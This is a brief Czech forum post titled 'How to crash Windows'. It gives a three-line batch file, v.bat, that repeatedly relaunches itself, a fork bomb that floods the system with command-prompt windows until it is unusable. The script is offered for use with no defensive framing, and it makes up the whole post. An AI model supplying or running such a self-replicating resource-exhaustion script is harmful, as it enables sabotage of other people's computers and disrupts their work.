Ashus.ashus.net

Full Version: Jak shodit Windows
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Zkopírujte následující do poznámkového bloku a uložte to jako v.bat.
Code:
start v.bat
start v.bat
start v.bat

Po spuštění se začne otvírat spousta oken příkazového řádku a po čase se práce na systému stane téměř nemožnou. Systém jako takový nespadne, ale prostředky půjdou do háje.